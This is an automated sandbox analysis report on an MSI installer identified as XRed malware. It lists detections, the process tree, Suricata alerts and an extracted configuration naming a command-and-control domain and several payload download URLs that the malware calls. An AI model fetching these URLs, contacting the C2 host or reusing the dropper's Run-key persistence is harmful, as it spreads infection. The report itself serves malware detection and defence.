Windows Analysis Report
xyxmml.msi

Overview

General Information

Sample name:xyxmml.msi
Analysis ID:1582349
MD5:51dd5767de678bb6359cbb175319f0ec
SHA1:76ae487dda6cf3651a9b2b30614c0fefd1f3149c
SHA256:5a49f64634ac29f37b3e53f5a1e37b90e8f3a385683f24083c68aee092408314
Tags:knkbkk212msiuser-JAMESWT_MHT
Infos:

Detection

XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Classification

  • System is w10x64
  • msiexec.exe (PID: 7008 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\xyxmml.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 2976 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • MSID754.tmp (PID: 7108 cmdline: "C:\Windows\Installer\MSID754.tmp" MD5: 1D2237FAF8E6198625010CB580280901)
      • Synaptics.exe (PID: 1360 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 7103F3EEC43BBABE34068295157F9F1C)
        • WerFault.exe (PID: 7792 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 3728 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 6256 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 2508 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • Synaptics.exe (PID: 7640 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 7103F3EEC43BBABE34068295157F9F1C)
  • cleanup
{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source | Rule | Description | Author | Strings
xyxmml.msi | JoeSecurity_XRed | Yara detected XRed | Joe Security |
xyxmml.msi | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
C:\Windows\Installer\63d57e.msi | JoeSecurity_XRed | Yara detected XRed | Joe Security |
C:\Windows\Installer\63d57e.msi | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\Windows\Installer\MSID6D6.tmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
C:\Windows\Installer\MSID6D6.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\ProgramData\Synaptics\RCXDBF7.tmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |

Source | Rule | Description | Author | Strings
00000003.00000000.1324128268.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
00000003.00000000.1324128268.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
Process Memory Space: MSID754.tmp PID: 7108 | JoeSecurity_XRed | Yara detected XRed | Joe Security |

Source | Rule | Description | Author | Strings
3.0.MSID754.tmp.400000.0.unpack | JoeSecurity_XRed | Yara detected XRed | Joe Security |
3.0.MSID754.tmp.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

                          System Summary

                          Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Installer\MSID754.tmp, ProcessId: 7108, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                          Source: File created | Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 1360, TargetFilename: C:\Users\user\AppData\Local\Temp\13zKLTpU.xlsm
                          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                          2024-12-30T11:49:18.852668+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49761 | 142.250.186.78 | 443 | TCP
                          2024-12-30T11:49:18.937710+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49762 | 142.250.186.78 | 443 | TCP
                          2024-12-30T11:49:19.827160+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49771 | 142.250.186.78 | 443 | TCP
                          2024-12-30T11:49:19.917343+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49774 | 142.250.186.78 | 443 | TCP
                          2024-12-30T11:49:20.805020+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49785 | 142.250.186.78 | 443 | TCP
                          2024-12-30T11:49:20.938424+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49787 | 142.250.186.78 | 443 | TCP
                          2024-12-30T11:49:21.918738+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49797 | 142.250.186.78 | 443 | TCP
                          2024-12-30T11:49:21.926861+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49798 | 142.250.186.78 | 443 | TCP
                          2024-12-30T11:49:23.528849+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49818 | 142.250.186.78 | 443 | TCP
                          2024-12-30T11:49:23.558167+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49819 | 142.250.186.78 | 443 | TCP
                          2024-12-30T11:49:24.537920+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49832 | 142.250.186.78 | 443 | TCP
                          2024-12-30T11:49:24.623616+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49828 | 142.250.186.78 | 443 | TCP
                          2024-12-30T11:49:39.479104+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49841 | 142.250.186.78 | 443 | TCP
                          2024-12-30T11:49:39.486308+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.9 | 49842 | 142.250.186.78 | 443 | TCP

                          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                          2024-12-30T11:49:19.278537+0100 | 2832617 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49770 | 69.42.215.252 | 80 | TCP

                          AV Detection

                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Avira: detection malicious, Label: TR/Dldr.Agent.SH
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                          Source: C:\Users\user\Documents\~$cache1 | Avira: detection malicious, Label: TR/Dldr.Agent.SH
                          Source: C:\Users\user\Documents\~$cache1 | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                          Source: C:\ProgramData\Synaptics\RCXDBF7.tmp | Avira: detection malicious, Label: TR/Dldr.Agent.SH
                          Source: C:\ProgramData\Synaptics\RCXDBF7.tmp | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                          Source: C:\Windows\Installer\MSID754.tmp | Avira: detection malicious, Label: TR/Dldr.Agent.SH
                          Source: C:\Windows\Installer\MSID754.tmp | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                          Source: xyxmml.msi | Malware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | ReversingLabs: Detection: 92%
                          Source: C:\Windows\Installer\MSID754.tmp | ReversingLabs: Detection: 92%
                          Source: C:\Windows\SysWOW64\._cache_MSID754.tmp | ReversingLabs: Detection: 50%
                          Source: xyxmml.msi | ReversingLabs: Detection: 65%
                          Source: Submitted Sample | Integrated Neural Analysis Model: Matched 97.0% probability
                          Source: C:\ProgramData\Synaptics\Synaptics.exe | Joe Sandbox ML: detected
                          Source: C:\Users\user\Documents\~$cache1 | Joe Sandbox ML: detected
                          Source: C:\ProgramData\Synaptics\RCXDBF7.tmp | Joe Sandbox ML: detected
                          Source: C:\Windows\SysWOW64\._cache_MSID754.tmp | Joe Sandbox ML: detected
                          Source: C:\Windows\Installer\MSID754.tmp | Joe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                          Source: unknown | HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49761 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49762 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49771 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.9:49772 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49774 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.9:49773 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49785 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49787 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49818 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49819 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.9:49829 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49828 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49832 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.9:49831 version: TLS 1.2
                          Source: C:\Windows\System32\msiexec.exe | File opened: z:
                          Source: C:\Windows\System32\msiexec.exe | File opened: x:
                          Source: C:\Windows\System32\msiexec.exe | File opened: v:
                          Source: C:\Windows\System32\msiexec.exe | File opened: t:
                          Source: C:\Windows\System32\msiexec.exe | File opened: r:
                          Source: C:\Windows\System32\msiexec.exe | File opened: p:
                          Source: C:\Windows\System32\msiexec.exe | File opened: n:
                          Source: C:\Windows\System32\msiexec.exe | File opened: l:
                          Source: C:\Windows\System32\msiexec.exe | File opened: j:
                          Source: C:\Windows\System32\msiexec.exe | File opened: h:
                          Source: C:\Windows\System32\msiexec.exe | File opened: f:
                          Source: C:\Windows\System32\msiexec.exe | File opened: b:
                          Source: C:\Windows\System32\msiexec.exe | File opened: y:
                          Source: C:\Windows\System32\msiexec.exe | File opened: w:
                          Source: C:\Windows\System32\msiexec.exe | File opened: u:
                          Source: C:\Windows\System32\msiexec.exe | File opened: s:
                          Source: C:\Windows\System32\msiexec.exe | File opened: q:
                          Source: C:\Windows\System32\msiexec.exe | File opened: o:
                          Source: C:\Windows\System32\msiexec.exe | File opened: m:
                          Source: C:\Windows\System32\msiexec.exe | File opened: k:
                          Source: C:\Windows\System32\msiexec.exe | File opened: i:
                          Source: C:\Windows\System32\msiexec.exe | File opened: g:
                          Source: C:\Windows\System32\msiexec.exe | File opened: e:
                          Source: C:\Windows\SysWOW64\WerFault.exe | File opened: c:
                          Source: C:\Windows\System32\msiexec.exe | File opened: a:
                          Source: MSID754.tmp, 00000003.00000000.1324128268.0000000000401000.00000020.00000001.01000000.00000003.sdmp | Binary or memory string: [autorun]
                          Source: MSID754.tmp, 00000003.00000000.1324128268.0000000000401000.00000020.00000001.01000000.00000003.sdmp | Binary or memory string: autorun.inf
                          Source: xyxmml.msi | Binary or memory string: [autorun]
                          Source: xyxmml.msi | Binary or memory string: autorun.inf
                          Source: Synaptics.exe.3.dr | Binary or memory string: [autorun]
                          Source: Synaptics.exe.3.dr | Binary or memory string: autorun.inf
                          Source: 63d57e.msi.2.dr | Binary or memory string: [autorun]
                          Source: 63d57e.msi.2.dr | Binary or memory string: autorun.inf
                          Source: ~$cache1.4.dr | Binary or memory string: [autorun]
                          Source: ~$cache1.4.dr | Binary or memory string: autorun.inf
                          Source: RCXDBF7.tmp.3.dr | Binary or memory string: [autorun]
                          Source: RCXDBF7.tmp.3.dr | Binary or memory string: autorun.inf
                          Source: MSID6D6.tmp.2.dr | Binary or memory string: [autorun]
                          Source: MSID6D6.tmp.2.dr | Binary or memory string: autorun.inf
                          Source: MSID754.tmp.2.dr | Binary or memory string: [autorun]
                          Source: MSID754.tmp.2.dr | Binary or memory string: autorun.inf
                          Source: C:\Windows\Installer\MSID754.tmp | File opened: C:\Users\user\AppData\Roaming
                          Source: C:\Windows\Installer\MSID754.tmp | File opened: C:\Users\user\AppData
                          Source: C:\Windows\Installer\MSID754.tmp | File opened: C:\Users\user\AppData\Roaming\Microsoft
                          Source: C:\Windows\Installer\MSID754.tmp | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                          Source: C:\Windows\Installer\MSID754.tmp | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                          Source: C:\Windows\Installer\MSID754.tmp | File opened: C:\Users\user
                          Source: excel.exe | Memory has grown: Private usage: 2MB later: 69MB

                          Networking

                          Source: Network traffic | Suricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.9:49770 -> 69.42.215.252:80
                          Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49787 -> 142.250.186.78:443
                          Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49774 -> 142.250.186.78:443
                          Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49785 -> 142.250.186.78:443
                          Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49761 -> 142.250.186.78:443
                          Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49798 -> 142.250.186.78:443
                          Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49797 -> 142.250.186.78:443
                          Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49762 -> 142.250.186.78:443
                          Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49818 -> 142.250.186.78:443
                          Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49828 -> 142.250.186.78:443
                          Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49771 -> 142.250.186.78:443
                          Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49819 -> 142.250.186.78:443
                          Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49841 -> 142.250.186.78:443
                          Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49842 -> 142.250.186.78:443
                          Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49832 -> 142.250.186.78:443
                          Source: Malware configuration extractor | URLs: xred.mooo.com
                          Source: unknown | DNS query: name: freedns.afraid.org
                          Source: Joe Sandbox View | IP Address: 69.42.215.252
                          Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Host: docs.google.com | Cache-Control: no-cache
                          Source: global traffic | HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
                          Source: global traffic | HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive | Cookie: NID=520=PxoMmSRKBx14w5cp_JcSq0hA869335W3PsBTSVHSRRHus_4lEn8VYZRhI8qw0HXdmz9MAFUa6Wm0u02De3CNgJrDYWXVcFCCjCmIU-NVaiNRMmKTXviZEgB2xD6neHjlQqPQlLMvq64K_trRAz5K3GYl8E_46EDUlSvIqztdVSKOr27yXb0zcVU
                          Source: global traffic | HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive | Cookie: NID=520=DzX7dWpPgzFIJGfvg8ExuN2uMfaRPG_SwGcGHj08e7zdKKBpeydjRYdTU7Pw_u6pf3u1Bdk_KNnra7AxEZvvcChZB6HGPJvsJYwgunQQpb5mMfvbvIuzv4B9S99kU569f0MaVSlYJvWSVjciHMhvKHZymr9l7G18ZFAVOLb9ajtrLW5ppQvyPm4
                          Source: global traffic | HTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1 | User-Agent: MyApp | Host: freedns.afraid.org | Cache-Control: no-cache
                          Source: global traffic | DNS traffic detected: DNS query: docs.google.com
                          Source: global traffic | DNS traffic detected: DNS query: xred.mooo.com
                          Source: global traffic | DNS traffic detected: DNS query: freedns.afraid.org
                          Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
                          Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                              X-GUploader-UploadID: AFiumC6ESPAnwcEORxv5p8CaLRmq2JSfZSC5hVBsHa5VCfAxhQX4g_w9awq9Vk4aWnkJyui-I3bvJhk
                              Content-Type: text/html; charset=utf-8
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                              Date: Mon, 30 Dec 2024 10:49:19 GMT
                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                              Cross-Origin-Opener-Policy: same-origin
                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                              Content-Security-Policy: script-src 'report-sample' 'nonce-qtThlVbzU-ZOr8HMLo0ehw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                              Content-Length: 1652
                              Server: UploadServer
                              Set-Cookie: NID=520=qV6rTPWO8kpOHQ3mFtatW_ZseHmoLbgRYSqKkPwUEswZ4Y_LTJwPQr25o9sVjHpeGD0VKTZCD8drPB2qk5P5Ab0M0pvX0_ZvnIAdmjC7_UDvYU4yDVCjXtG5slbudraDZ_YhuVNtqq2CXG95knkGbXPKUsCWT9bmPblH5P3k3YIOIUfHgy-nnqU; expires=Tue, 01-Jul-2025 10:49:19 GMT; path=/; domain=.google.com; HttpOnly
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Content-Security-Policy: sandbox allow-scripts
                              Connection: close
                          Source: MSID754.tmp.2.dr; String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                          Source: Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978p
                          Source: Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978w)
                          Source: MSID754.tmp, 00000003.00000003.1336948973.0000000002340000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978x
                          Source: Amcache.hve.12.dr; String found in binary or memory: http://upx.sf.net
                          Source: MSID754.tmp, 00000003.00000003.1336948973.0000000002340000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlD
                          Source: MSID754.tmp.2.dr; String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                          Source: Synaptics.exe, 00000004.00000002.1606313975.0000000002240000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                          Source: MSID754.tmp.2.dr; String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                          Source: Synaptics.exe, 00000004.00000002.1606313975.0000000002240000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                          Source: MSID754.tmp.2.dr; String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                          Source: Synaptics.exe, 00000004.00000002.1606313975.0000000002240000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                          Source: MSID754.tmp, 00000003.00000003.1336948973.0000000002340000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarh
                          Source: MSID754.tmp.2.dr; String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                          Source: MSID754.tmp.2.dr; String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMX
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                          Source: Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.1435428385.0000000000960000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                          Source: Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRhI8&
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.1433165329.0000000005209000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.1435428385.0000000000960000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.000000000096F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                          Source: Synaptics.exe, 00000004.00000003.1398475623.0000000000967000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.1435428385.0000000000960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWAQ
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWXYZ%
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWw
